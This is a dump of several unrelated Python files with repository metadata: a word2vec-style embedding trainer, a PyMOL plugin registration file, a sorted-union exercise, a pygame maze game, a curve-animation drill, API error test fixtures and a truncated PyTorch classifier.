# assert self.word_count == sum([t.count for t in self.vocab_items]), 'word_count and sum of t.count do not agree'
print 'Total words in training file: %d' % self.word_count
print 'Total bytes in training file: %d' % self.bytes
print 'Vocab size: %d' % len(self)
def __getitem__(self, i):
return self.vocab_items[i]
def __len__(self):
return len(self.vocab_items)
def __iter__(self):
return iter(self.vocab_items)
def __contains__(self, key):
return key in self.vocab_hash
def __sort(self, min_count):
tmp = []
tmp.append(VocabItem('<unk>'))
unk_hash = 0
count_unk = 0
for token in self.vocab_items:
if token.count < min_count:
count_unk += 1
tmp[unk_hash].count += token.count
else:
tmp.append(token)
tmp.sort(key=lambda token: token.count, reverse=True)
# Update vocab_hash
vocab_hash = {}
for i, token in enumerate(tmp):
vocab_hash[token.word] = i
self.vocab_items = tmp
self.vocab_hash = vocab_hash
print
print 'Unknown vocab size:', count_unk
def get_key(self, i):
return self.vocab_hash.keys()[list(self.vocab_hash.values()).index(i)]
def indices(self, tokens):
return [self.vocab_hash[token] if token in self else self.vocab_hash['<unk>'] for token in tokens]
def domain_corpus(di):
f = open(di).read().lower().split()
domain_word_list = set()
for word in f:
domain_word_list.add(word)
return(domain_word_list)
class UnigramTable1:
def __init__(self, vocab):
#unigram table for (w,c) both belonging to domain_vocab
pie = 0.5
smoothing_parameter = 0.75
xs = np.random.uniform(low=0, high=1)
table_size = 1e8
domain_vocab = domain_corpus(di)
table1 = np.zeros(table_size, dtype=np.uint32)
if xs < pie:
norm = len(domain_vocab)
#norm = float(sum([math.pow(c.count, smoothing_parameter)for c in vocab]))
print 'Filling the unigram table for case1'
p = 0 #Cumulative probability for case1
i = 0
for j, unigram in enumerate(vocab):
p += float(math.pow(unigram.count, smoothing_parameter)) / norm
while i < table_size and float(i) / table_size < p:
table1[i] = j
i += 1
self.table1 = table1
else:
norm = float(sum([math.pow(t.count, smoothing_parameter) for t in domain_vocab]))
print 'Filling the unigram table for case1'
p = 0 # Cumulative probability for case1
i = 0
for j, unigram in enumerate(vocab):
p += float(math.pow(unigram.count, smoothing_parameter)) / norm
while i < table_size and float(i) / table_size < p:
table1[i] = j
i += 1
self.table1 = table1
# This is used as the sample to pick the neagtive samples
def sample(self, count):
indices = np.random.randint(low=0, high=len(self.table1), size=count)
return [self.table1[i] for i in indices]
class UnigramTable2:
def __init__(self, vocab):
vocab_size = len(vocab)
power = 0.75
norm = sum([math.pow(t.count, power) for t in vocab])
table_size = 1e8 # Length of the unigram table
table2 = np.zeros(table_size, dtype=np.uint32)
print 'Filling the unigram table for case2'
p = 0 # Cumulative probability
i = 0
for j, unigram in enumerate(vocab):
p += float(math.pow(unigram.count, power)) / norm
while i < table_size and float(i) / table_size < p:
table2[i] = j
i += 1
self.table2 = table2
def sample(self, count):
iters = np.random.randint(low=0, high=len(self.table2), size=count)
return [self.table2[i] for i in iters]
def sigmoid(z):
if z > 6:
return 1.0
elif z < -6:
return 0.0
else:
return 1 / (1 + math.exp(-z))
def init_net(dim, vocab_size):
# Init syn0 with random numbers from a uniform distribution on the interval [-0.5, 0.5]/dim
tmp = np.random.uniform(low=-0.5 / dim, high=0.5 / dim, size=(vocab_size, dim))
syn0 = np.ctypeslib.as_ctypes(tmp)
syn0 = Array(syn0._type_, syn0, lock=False)
# Init syn1 with zeros
tmp = np.zeros(shape=(vocab_size, dim))
syn1 = np.ctypeslib.as_ctypes(tmp)
syn1 = Array(syn1._type_, syn1, lock=False)
return (syn0, syn1)
def train_process():
start = 0
end = vocab.bytes
fi.seek(start)
global_word_count = 0
alpha = starting_alpha
word_count = 0
last_word_count = 0
while fi.tell() < end:
line = fi.readline().strip()
# Skip blank lines
if not line:
continue
# Init sent, a list of indices of words in line
sent = vocab.indices(['<bol>'] + line.split() + ['<eol>'])
for sent_pos, token in enumerate(sent):
current_token = Vocab.get_key(vocab, token)
if word_count % 10000 == 0:
global_word_count += (word_count - last_word_count)
last_word_count = word_count
# Recalculate alpha
alpha = starting_alpha * (1 - float(global_word_count) / vocab.word_count)
if alpha < starting_alpha * 0.0001:
alpha = starting_alpha * 0.0001
# Randomize window size, where win is the max window size
current_win = np.random.randint(low=1, high=win + 1)
context_start = max(sent_pos - current_win, 0)
context_end = min(sent_pos + current_win + 1, len(sent))
context = sent[context_start:sent_pos] + sent[sent_pos + 1:context_end]
for context_word in context:
current_context = Vocab.get_key(vocab, context_word)
if current_token in domain_vocab and current_context in domain_vocab:
print "this is trained with first case"
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in table1.sample(neg)]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[target])
p = sigmoid(z)
g = alpha * (label - p)
neu1e += g * syn1[target] # Error to backpropagate to syn0
syn1[target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
elif current_token and current_context not in domain_vocab:
print "trained with second case"
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in table2.sample(neg)]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[target])
p = sigmoid(z)
g = alpha * (label - p)
neu1e += g * syn1[target] # Error to backpropagate to syn0
syn1[target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
else:
print "trained using third case"
z = np.random.uniform(0, 1)
pie0 = 0.5
if z < pie0:
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in context]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[-target])
p = sigmoid(z)
g = alpha * (label - p)
neu1e += g * syn1[-target] # Error to backpropagate to syn0
syn1[-target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
else:
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in context]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[target])
p = sigmoid(z)
g = alpha * (label + p)
neu1e += g * syn1[target] # Error to backpropagate to syn0
syn1[target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
word_count += 1
# Print progress info
global_word_count += (word_count - last_word_count)
# Print progress info
sys.stdout.write("\rAlpha: %f Progress: %d of %d (%.2f%%)" %
(alpha, global_word_count, vocab.word_count,
float(global_word_count) / vocab.word_count * 100))
sys.stdout.flush()
fi.close()
'''
def save(vocab, syn0, fo, fo2):
print 'Saving model to', fo
dim = len(syn0[0])
#saving the names of the words
fo = open(fo, 'w')
fop = open('pickle_tokens', 'wb')
fo.write('%d %d\n' % (len(syn0), dim))
for token, vector in zip(vocab, syn0):
word = token.word
#vector_str = ' '.join([str(s) for s in vector])
fo.write('%s\n' % (word))
pickle.dump(word, fop)
fo.close()
fop.close()
#saving the numpy arrays of word vectors
fo2 = open(fo2, 'w')
fop2 = open('pickle_vector', 'wb')
fo2.write('%d %d\n' % (len(syn0), dim))
for token, vector in zip(vocab, syn0):
#word = token.word
vector_str = np.array(','.join([str(s) for s in vector]))
fo2.write('%s\n' % (vector_str))
pickle.dump(vector_str, fo2)
fo2.close()
fop2.close()
'''
def save(vocab, syn0, fo):
print 'Saving model to', fo
dim = len(syn0[0])
fo = open(fo, 'w')
fo.write('%d %d\n' % (len(syn0), dim))
for token, vector in zip(vocab, syn0):
word = token.word
vector_str = ','.join([str(s) for s in vector])
fo.write('%s %s\n' % (word, vector_str))
fo.close()
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)
plot_only = 2000
low_dim_embs = tsne.fit_transform(syn0)
plot_with_labels(low_dim_embs)
def global_func(*args):
global vocab, domain_vocab, syn0, syn1, table1, table2, neg, dim, starting_alpha
global win, global_word_count, fi
vocab, domain_vocab, syn0_tmp, syn1_tmp, table1, table2, neg, dim, starting_alpha, win, global_word_count = args[:-1]
fi = open(args[-1], 'r')
with warnings.catch_warnings():
warnings.simplefilter('ignore', RuntimeWarning)
syn0 = np.ctypeslib.as_array(syn0_tmp)
syn1 = np.ctypeslib.as_array(syn1_tmp)
warnings.filterwarnings('ignore')
def similarity(i1, i2):
return (1- spatial.distance.cosine(i1, i2))
def plot_with_labels(low_dim_embs, filename='tsne.png'):
#assert low_dim_embs.shape[0] >= len(labels), "More labels than embeddings"
plt.figure(figsize=(18, 18)) # in inches
for i in xrange(1004):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.savefig(filename)
def train(fi, fo, neg, dim, alpha, win, min_count):
"""#STEP1"""
# Read train file to init vocab
vocab = Vocab(fi, min_count)
domain_vocab = domain_corpus(di)
"""#STEP2"""
# Init net
syn0, syn1 = init_net(dim, len(vocab))
"""#STEP3"""
global_word_count = 0
"""#STEP4"""
table1 = None
table2 = None
print 'Initializing unigram table'
table1 = UnigramTable1(vocab)
table2 = UnigramTable2(vocab)
global_func(vocab, domain_vocab, syn0, syn1, table1, table2, neg, dim, alpha, win, global_word_count, fi)
""""#STEP5"""
# Begin training using num_processes workers
t0 = time.time()
train_process()
t1 = time.time()
print 'Completed training. Training took', (t1 - t0) / 60, 'minutes'
"""#STEP6"""
# Save model to file
save(vocab, syn0, fo)
i1 = syn0[1]
i2 = syn0[2]
similarity(i1, i2)
fi = 'cleaned_test_data.txt'
fo = 'list_of_words.txt'
fo2 = 'numpy_array_vectors.txt'
di = 'Loughran_McDonald_AggregateIPOWordList.txt'
train(fi, fo, 100, 300, 0.01, 1, 1)
| [
"[email protected]"
] | |
dfc3047922128f9d7077164ac775b666d5d75976 | 31de5e1ddecdfbd183c83ea1cf56a2d2a717709c | /src/pymolscripts/__init__.py | d80653dc34ba61e61d4d687352f69de830ebddff | [] | no_license | awacha/pymolscripts | 3dd6b52045074ea603ece4c3700494bd0dc16c99 | fde868f420e820103cd95e9bdb505d08aad78c9a | refs/heads/master | 2021-05-23T05:30:06.698975 | 2018-05-16T11:50:48 | 2018-05-16T11:50:48 | 95,018,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,790 | py | from __future__ import absolute_import, unicode_literals, print_function, with_statement
from pymol import cmd
from . import utils, io, display, betapeptides, bilayer
cmd.extend('save_pdb_ordered', io.savepdb_ordered.save_pdb_ordered)
cmd.extend('save_gro', io.savegro.save_gro)
cmd.extend('show_axes', display.axes.show_axes)
cmd.extend('number_residues', betapeptides.recognize_peptide.number_residues)
cmd.extend('number_chains', betapeptides.recognize_peptide.number_chains)
cmd.extend('recognize_peptide', betapeptides.recognize_peptide.recognize_peptide)
cmd.extend('select_peptide_bonds', betapeptides.recognize_peptide.select_peptide_bonds)
cmd.extend('match_amino_acid', betapeptides.recognize_peptide.match_amino_acid)
cmd.extend('select_beta_backbone', betapeptides.recognize_peptide.select_beta_backbone)
cmd.extend('order_atoms_in_peptide', betapeptides.recognize_peptide.order_atoms_in_peptide)
cmd.extend('beta_hbonds', betapeptides.hbonds.beta_hbonds)
cmd.extend('generate_hbond_constraints', betapeptides.hbonds.generate_hbond_constraints)
cmd.extend('generate_hbond_restraints_harmonic', betapeptides.hbonds.generate_hbond_restraints_harmonic)
cmd.extend('generate_hbond_restraints_piecewise', betapeptides.hbonds.generate_hbond_restraints_piecewise)
cmd.extend('helicize_beta_peptide', betapeptides.setbetahelix.helicize_beta_peptide)
cmd.extend('set_beta_helix', betapeptides.setbetahelix.set_beta_helix)
cmd.extend('select_wrong_bond_numbers', betapeptides.structure_cleaning.select_wrong_bond_numbers)
cmd.extend('select_intralayer_waters', bilayer.bilayertools.select_intralayer_waters)
cmd.extend('optimize_beta_helix', betapeptides.helix_optimization.optimize_beta_helix)
cmd.extend('unbond_close_hydrogen_bonds', betapeptides.hbonds.unbond_close_hydrogen_bonds) | [
"[email protected]"
] | |
0b158c51d3a43b15bc506a014de63a0c79b3e622 | 8ef26b119f704e190ab4b9f8e48d8361b5e1d744 | /interview/python/sorted_union.py | 1ef5280709006df38b612588d02fdac4b0426813 | [] | no_license | derektolliver/spectral-jellyfish | 86264889e8f29d41f710ae7f55a6ac9a3b077901 | 37ea96f2adc78b1788fc0025c95b6a1f8d227b05 | refs/heads/master | 2021-01-23T21:43:33.270217 | 2017-01-04T13:00:00 | 2017-03-08T20:38:36 | 57,347,177 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 942 | py | def sorted_union(l1, l2):
p1 = 0
p2 = 0
result = []
while p1 < len(l1) and p2 < len(l2):
to_add = 0
if l1[p1] <= l2[p2]:
to_add = l1[p1]
p1 += 1
else:
to_add = l2[p2]
p2 += 1
if len(result) == 0 or (len(result) > 0 and to_add != result[len(result) - 1]):
result.append(to_add)
if p1 < len(l1):
for i in range(p1, len(l1)):
if len(result) > 0 and result[len(result) - 1] != l1[i]:
result.append(l1[i])
elif p2 < len(l2):
for i in range(p2, len(l2)):
if len(result) > 0 and result[len(result) - 1] != l2[i]:
result.append(l2[i])
print(result)
if __name__ == "__main__":
l1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
l2 = [1, 5, 10, 15, 20, 25]
sorted_union(l1, l2)
l1 = [1, 1, 1, 1, 1, 1]
l2 = [1, 1, 1, 1, 1, 1]
sorted_union(l1, l2)
| [
"[email protected]"
] | |
aaaca1623cd6bdac79b7bf18c41748fae13a3de3 | 11ed0243962ca1b88d6a445f61b3c83f6f32dd80 | /No8.Labyrinth_using_pygame.py | f6769ea60d45cfe75ae7c4ad25751c169708f4a0 | [
"MIT"
] | permissive | programmingphys/TrainProgs | be72ce3bcfbeba117dc6079c6ca988c3513d5ef0 | 7a011184a3d936328e0f31f1aca6eb3a86cb3c10 | refs/heads/master | 2020-04-24T08:15:18.045541 | 2019-03-21T11:13:34 | 2019-03-21T11:13:34 | 171,824,996 | 0 | 1 | MIT | 2019-04-19T05:59:50 | 2019-02-21T07:47:43 | Python | UTF-8 | Python | false | false | 8,676 | py | #首先输入行数列数
#esc退出
#r复位
#t提示
import numpy as np
import pygame
from pygame.locals import *
import random
class Labyrinth:
def __init__(self, rows=30, cols=40):
self.rows = rows
self.cols = cols
self.keep_going = 1
#keep_going = 1代表生成继续进行
self.M=np.zeros((rows,cols,3), dtype=np.uint8)
self.laby=np.ones((rows*2+1,cols*2+1),dtype=np.uint8)
self.N=np.zeros((rows*2+1,cols*2+1,2), dtype=np.uint8)
self.start=[1,0]
self.end = [rows*2-1, cols*2]
self.direction = [[-1, 0], [0, -1], [1, 0], [0, 1]]
def createlaby(self):
M = self.M
r = 0 #row
c = 0 #column
history = [(r,c)]
rows=self.rows
cols=self.cols
while history:
r,c = random.choice(history)
#随机选个格子
M[r,c,2] = 1
history.remove((r,c))
check = []
if c > 0:
if M[r,c-1,2]==1:
check.append('L')
elif M[r,c-1,2]==0:
history.append((r,c-1))
M[r,c-1,2]=2
if r > 0:
if M[r-1,c,2]==1:
check.append('U')
elif M[r-1,c,2]==0:
history.append((r-1,c))
M[r-1,c,2]=2
if c < cols-1:
if M[r,c+1,2]==1:
check.append('R')
elif M[r,c+1,2]==0:
history.append((r,c+1))
M[r,c+1,2]=2
if r < rows-1:
if M[r+1,c,2]==1:
check.append('D')
elif M[r+1,c,2]==0:
history.append((r+1,c))
M[r+1,c,2]=2
#开墙
#M(右,下,visited)
if len(check):
move_direction=random.choice(check)
if move_direction=='L':
M[r,c-1,0]=1
elif move_direction == 'U':
M[r-1,c,1]=1
elif move_direction == 'R':
M[r,c,0]=1
elif move_direction == 'D':
M[r,c,1]=1
else:
print('Error:select one of wall')
laby = self.laby
#laby矩阵中0代表路,1代表墙
for row in range(0,rows):
for col in range(0,cols):
cell_data = M[row,col]
laby[2*row+1,2*col+1]=0
if cell_data[0] == 1:
laby[2*row+1,2*col+2]=0
if cell_data[1] == 1:
laby[2*row+2,2*col+1]=0
laby[1][0]=0
laby[-2][-1]=0
N=self.N
for i in range(0,2*rows):
for j in range(0,2*cols):
if laby[i,j]==1:
N[i,j,0]=1
N[i,j,1]=1
elif laby[i,j]==0:
if laby[i,j+1]==1:
N[i,j,0]=1
if laby[i+1,j]==1:
N[i,j,1]=1
N[2*rows,:,0]=N[2*rows,:,1]=N[:,2*cols,0]=N[:,2*cols,1]=1
return laby
def solve_laby(self,i,j):
#解迷宫
self.start=[i,j]
steps=self.walk()
last =steps[len(self.laby) - 2][len(self.laby[0]) - 1]
lookup_path = [[len(self.laby) - 2, len(self.laby[0]) - 1], ]
while last > 0:
last -= 1
index = lookup_path[-1]
for d in self.direction:
move=[0,0]
move[0]=index[0]+d[0]
move[1]=index[1]+d[1]
val, err = self.at(steps, move)
if val == last:
lookup_path.append(move)
break
lookup_path.pop()
lookup_path.reverse()
lookup_path.pop()
lookup_path.append([i,j])
return lookup_path
def at(self, grid, x):
#解迷宫
if x[0] < 0 or x[0] >= len(grid):
return 0,False
if x[1] < 0 or x[1] >= len(grid[0]):
return 0,False
return grid[x[0]][x[1]], True
def walk(self):
#解迷宫
steps = [[i * 0 for i in range(len(self.laby[0]))] for j in range(len(self.laby))]
Q = [self.start]
while len(Q) > 0:
index = Q[0]
if index == self.end:
break
Q = Q[1:]
for d in self.direction:
move=[0,0]
move[0]=index[0]+d[0]
move[1]=index[1]+d[1]
val, ok = self.at(self.laby,move)
if not ok or val == 1:
continue
val, ok = self.at(steps,move)
if not ok or val != 0:
continue
if move == self.start:
continue
val, ok = self.at(steps, index)
if ok:
steps[move[0]][move[1]] = val + 1
Q.append(move)
return steps
class Game:
def __init__(self,num_rows,num_cols):
self.size = (600,600)
self.screen = pygame.display.set_mode(self.size)
pygame.display.set_caption('Labyrinth')
font = pygame.font.SysFont(pygame.font.get_default_font(), 55)
text = font.render("Generating...", 1, (255,255,255))
rect = text.get_rect()
rect.center = self.size[0]/2, self.size[1]/2
self.screen.blit(text, rect)
pygame.display.update(rect)
self.rows=num_rows
self.cols=num_cols
self.solve_laby=False
def start(self):
if True:
self.laby_obj = Labyrinth(self.rows,self.cols)
else:
self.laby_obj = Labyrinth(10,10)
self.laby_obj.createlaby()
self.draw_laby()
self.reset_player()
self.loop()
def draw_laby(self):
self.screen.fill((255,255,255))
self.cell_width = self.size[0]/(self.cols*2+1)
self.cell_height = self.size[1]/(self.rows*2+1)
cols=self.cols
rows=self.rows
for i in range(rows*2+1):
for j in range(cols*2+1):
if self.laby_obj.laby[i,j]==1:
pygame.draw.rect(self.screen,(0,0,0),(j*self.cell_width,\
i*self.cell_height,self.cell_width+1,self.cell_height+1))
pygame.display.update()
def reset_player(self):
# Make the sprites for the player.
rect = 0, 0,self.cell_width, self.cell_height
rows=self.rows
cols=self.cols
base = pygame.Surface((self.cell_width, self.cell_height))
base.fill((255,255,255))
self.red = base.copy()
self.green = base.copy()
self.blue_p = base.copy()
self.white = base.copy()
r = (255,0,0)
g = (0,255,0)
b = (0,0,255)
white=(255,255,255)
pygame.draw.ellipse(self.blue_p, b, rect)
pygame.draw.ellipse(self.green, g, rect)
pygame.draw.ellipse(self.white, white, rect)
pygame.draw.ellipse(self.red, r, rect)
#player_laby矩阵,实时储存经过地点
self.player_laby =np.zeros((2*rows+1,2*cols+1), dtype=np.uint8)
for i in range(rows*2+1):
for j in range(cols*2+1):
if self.laby_obj.laby[i,j]==0:
self.screen.blit(base, (j*self.cell_width, i*self.cell_height))
self.screen.blit(self.green, (cols*2*self.cell_width, (rows*2-1)*self.cell_height))
self.cx =0
self.cy =1
self.last_move = None # For last move fun
self.solve_laby=False
def loop(self):
self.clock = pygame.time.Clock()
self.keep_going = 1
while self.keep_going:
moved = 0
self.clock.tick(10)
for event in pygame.event.get():
if event.type == QUIT:
self.keep_going = 0
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
self.keep_going = 0
if event.key == K_r:
self.reset_player()
if event.key==K_t:
self.solve_laby=True
self.pathes=self.laby_obj.solve_laby(self.cy, self.cx)
if event.key == K_DOWN:
self.move_player('d')
moved = 1
if event.key == K_UP:
self.move_player('u')
moved = 1
if event.key == K_LEFT:
self.move_player('l')
moved = 1
if event.key == K_RIGHT:
self.move_player('r')
moved = 1
keys = pygame.key.get_pressed()
if not moved:
if keys[K_DOWN]:
self.move_player('d')
if keys[K_UP]:
self.move_player('u')
if keys[K_LEFT]:
self.move_player('l')
if keys[K_RIGHT]:
self.move_player('r')
self.draw_player()
pygame.display.update()
def move_player(self, dir):
#M(右,下,visited)
no_move = 0
try:
if dir == 'u':
if not self.laby_obj.N[self.cy-1,self.cx,1]:
self.player_laby[self.cy, self.cx]+= 1
self.cy -= 1
else: no_move = 1
elif dir == 'd':
if not self.laby_obj.N[self.cy,self.cx,1]:
self.player_laby[self.cy, self.cx]+= 1
self.cy += 1
else: no_move = 1
elif dir == 'l':
if not self.laby_obj.N[self.cy,self.cx-1,0]:
self.player_laby[self.cy, self.cx]+= 1
self.cx -= 1
else: no_move = 1
elif dir == 'r':
if not self.laby_obj.N[self.cy,self.cx,0]:
self.player_laby[self.cy, self.cx]+= 1
self.cx += 1
else: no_move = 1
else:
no_move = 1
except KeyError: # Tried to move outside screen
no_move = 1
if ((dir == 'u' and self.last_move == 'd') or \
(dir == 'd' and self.last_move == 'u') or \
(dir == 'l' and self.last_move == 'r') or \
(dir == 'r' and self.last_move == 'l')) and \
not no_move:
self.player_laby[self.cy, self.cx]+= 1
if not no_move:
self.last_move = dir
if self.cx == 2*self.cols and self.cy+1 == 2*self.rows:
self.keep_going = 0
def draw_player(self):
for i in range(self.rows*2+1):
for j in range(self.cols*2+1):
if self.player_laby[i,j] > 0:
self.screen.blit(self.white, (j*self.cell_width, i*self.cell_height))
if self.solve_laby:
for path in self.pathes:
self.screen.blit(self.red, (path[1]*self.cell_width, path[0]*self.cell_height))
self.screen.blit(self.blue_p, (self.cx*self.cell_width, \
self.cy*self.cell_height))
num_rows = int(input("Rows: ")) # 行数
num_cols = int(input("Columns: ")) # 列数
pygame.init()
g = Game(num_rows,num_cols)
g.start()
| [
"[email protected]"
] | |
43f6dc6b7f401fbd8ce3b338f1841df222d03d8a | 220102570677dff8818e5e7e84b23e70f01ae503 | /Drill-06/drill6(8-2).py | f608e2ffe958982782e7260d69c93c28c703dfb6 | [] | no_license | hanGB/2018182039-2DGP-DRILLS | a2183fe4fc2750559f49b3a3bb1ad94c01407b04 | 4953a5f1159d587dd130908cf3c3697165710ce0 | refs/heads/master | 2020-08-05T23:01:17.344695 | 2019-12-02T02:55:20 | 2019-12-02T02:55:20 | 212,746,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,513 | py | from pico2d import *
import random
KPU_WIDTH, KPU_HEIGHT = 1280, 1024
open_canvas(KPU_WIDTH, KPU_HEIGHT)
kpu = load_image("KPU_GROUND.png")
character = load_image("animation_sheet.png")
def cancle():
global game
events = get_events()
for event in events:
if event.type == SDL_QUIT:
game = False
game = True
face = 1
frame = 0
pointx = [random.randint(0, KPU_WIDTH) for n in range(10)]
pointy = [random.randint(0, KPU_HEIGHT) for n in range(10)]
while game:
for n in range(0, 10):
for i in range(0, 100, 1):
clear_canvas()
kpu.draw(KPU_WIDTH / 2, KPU_HEIGHT / 2)
t = i / 100
character_x = ((-t ** 3 + 2 * t ** 2 - t) * pointx[n % 10] + (3 * t ** 3 - 5 * t ** 2 + 2) * pointx[(n + 1) % 10] + (-3 * t ** 3 + 4 * t ** 2 + t) * pointx[(n + 2) % 10] + (t ** 3 - t ** 2) * pointx[(n + 3) % 10]) / 2
character_y = ((-t ** 3 + 2 * t ** 2 - t) * pointy[n % 10] + (3 * t ** 3 - 5 * t ** 2 + 2) * pointy[(n + 1) % 10] + (-3 * t ** 3 + 4 * t ** 2 + t) * pointy[(n + 2) % 10] + (t ** 3 - t ** 2) * pointy[(n + 3) % 10]) / 2
if pointx[(n + 1) % 10] - pointx[(n + 2) % 10] < 0:
face = 1
else:
face = 0
character.clip_draw(frame * 100, 100 * face, 100, 100, character_x, character_y)
frame = (frame + 1) % 8
update_canvas()
cancle()
if game == False:
break
delay(0.01)
| [
"[email protected]"
] | |
1cff17c14a960f91929536de9ce6238f968e1d07 | 2ab5a2208c6a4925b8079fe385b7e39a656e3ea4 | /tests/fixtures/errors.py | d7f6513c645f7418e03784f82f3cd66604bcd6e9 | [
"MIT"
] | permissive | trehansalil/pyairvisual | 3374203d38e9963128819d615b59be353f7c92ce | eec5e294b19f3bf0d8aedbda68c5ad6b8271fd20 | refs/heads/master | 2020-09-04T00:24:02.190629 | 2019-11-01T19:59:43 | 2019-11-01T19:59:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,448 | py | """Define fixtures for the various errors."""
import pytest
@pytest.fixture()
def fixture_city_not_found():
"""Return a response when a city can't be found."""
return {"status": "fail", "data": {"message": "city_not_found"}}
@pytest.fixture()
def fixture_generic_error():
"""Return an unknown/generic error response."""
return {"status": "fail", "data": {"message": "unknown_key"}}
@pytest.fixture()
def fixture_incorrect_api_key():
"""Return a response when an API key is invalid."""
return {"status": "fail", "data": {"message": "incorrect_api_key"}}
@pytest.fixture()
def fixture_key_expired():
"""Return a response when the API key is expired."""
return {"status": "fail", "data": {"message": "api_key_expired"}}
@pytest.fixture()
def fixture_limit_reached():
"""Return a response when the API limit is reached."""
return {"status": "fail", "data": {"message": "call_limit_reached"}}
@pytest.fixture()
def fixture_no_nearest_station():
"""Return a response when the nearest station cannot be determined."""
return {"status": "fail", "data": {"message": "no_nearest_station"}}
@pytest.fixture()
def fixture_no_node():
"""Return a response when a node cannot be found."""
return "node not found"
@pytest.fixture()
def fixture_permission_denied():
"""Return a response when permission is denied."""
return {"status": "fail", "data": {"message": "permission_denied"}}
| [
"[email protected]"
] | |
8169d37f0df406a34474bf3c961e7385eb0724ab | 48b27a8d8e5933a1f7d8b2e5aa9f204a311455a9 | /Toy_Example/language_model.py | 1a7b634c50e827bd6791b78037eeb6daea225af9 | [] | no_license | skgabriel/Math_Model | 922150ea5344dd83497e6f77443178b41d38eae2 | 696b69f11afd9942e536bb55866bf5b0d32294d0 | refs/heads/master | 2021-05-06T18:49:17.249262 | 2017-11-29T03:28:05 | 2017-11-29T03:28:05 | 112,043,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,469 | py | #Import statements
import pickle, json, cv2, os, sys
import tqdm, torch, torchvision
import numpy as np
from pprint import pprint
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
data_root = './Data/'
class MathData(Dataset):
"""
Data Loading
"""
def __init__(self, root, split='Train', transform = transforms.Compose([transforms.ToTensor()]), feature_index=None, cache_json=True):
self.root = root
self.split = split
self.transform = transform
self.feature_index = feature_index
self.cache_json = cache_json
files = os.listdir(os.path.join(root, split))
self.name_indices = sorted(
[f.split('.')[0] for f in files if f[-4:] == '.jpg'])
if(cache_json):
self.feature_cache = {}
iterate = tqdm.tqdm(self.name_indices)
iterate.set_description('Caching Labels')
for name_index in iterate:
self.feature_cache[name_index] = self.read_json_feature(
name_index)
def get_file_path(self, suffix, name_index):
file_name = ('%s.' + '%s')%(name_index, suffix)
return os.path.join(self.root, self.split, file_name)
def read_json_feature(self, split, name_index):
file_path = self.get_file_path('json', split + '_labels')
data = json.load(open(file_path))
file_name = name_index + '.jpg'
return [entry for (index, entry) in enumerate(data)
if entry['image'] == file_name][0]['label']
def __getitem__(self, index):
name_index = self.name_indices[index]
dataset = (name_index.split('_'))[0]
image = Image.open(
self.get_file_path('jpg', name_index)).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.cache_json:
feature = self.feature_cache[name_index]
else:
feature = self.read_json_feature(dataset, name_index)
return image, feature
def __len__(self):
return len(self.name_indices)
def unity_collate(batch):
images, features = [], []
for i, b in enumerate(batch):
image, feature = b
images.append(image)
features.append([encode(feature)])
return torch.stack(images), torch.LongTensor(features)
class Net(nn.Module):
"""
neural network architecture code
"""
def __init__(self, feature_id):
super(Net, self).__init__()
self.convs = []
self.BNs = []
# Filter sizes (Input/Output)
io = [(3, 8), (8, 16), (16, 32), (32, 64), (64, 32)]
for i, o in io:
self.convs.append(nn.Conv2d(i, o, 5, stride=2, padding=(0,0)).cuda())
self.BNs.append(nn.BatchNorm2d(o).cuda())
self.fc1 = nn.Linear(32 * 6 * 6, 128).cuda()
self.fc2 = nn.Linear(128, 32).cuda()
self.fc3 = nn.Linear(32, 5) .cuda()
self.drop1 = nn.Dropout()
self.drop2 = nn.Dropout()
self.feature_id = feature_id
self.optimizer = optim.Adam(self.parameters(), lr=1e-4,
weight_decay=1e-4)
self.loss = nn.CrossEntropyLoss()
def forward(self, images):
x = images
for conv, bn in zip(self.convs, self.BNs):
x = bn(F.relu(conv(x)))
x = x.view(-1, 32 * 6 * 6)
x = F.relu(self.drop1(self.fc1(x)))
x = F.relu(self.drop2(self.fc2(x)))
x = self.fc3(x)
return x
def train_batch(self, images, labels):
self.optimizer.zero_grad()
output = self(images)
single_feature_labels = labels[:,self.feature_id]
loss = self.loss(output, single_feature_labels)
loss.backward()
self.optimizer.step()
val, preds = torch.max(output, 1)
return loss.data[0], preds
def save_model(self, file_path):
torch.save(self.state_dict(), file_path)
# Data Loading
batch_size = 64
feature_id = 0
train_set = DataLoader(
UnityImgData(data_root, cache_json=False),
batch_size = batch_size,
num_workers = 4,
shuffle = True,
collate_fn = unity_collate)
test_set = DataLoader(
UnityImgData(data_root, cache_json=False, split='test'),
batch_size = batch_size,
num_workers = 4,
shuffle = True,
collate_fn = unity_collate)
model = Net(feature_id)
def run_eval():
"""
Evaluation
"""
model.train(mode=False)
v_pred = []
for images, features in test_set:
image_var = Variable(images).cuda()
label_var = Variable(features).cuda()
val, preds = torch.max(model(image_var), 1)
v_pred.extend([1 if p == g else 0 for p,g in
zip(preds.cpu().data.numpy(),
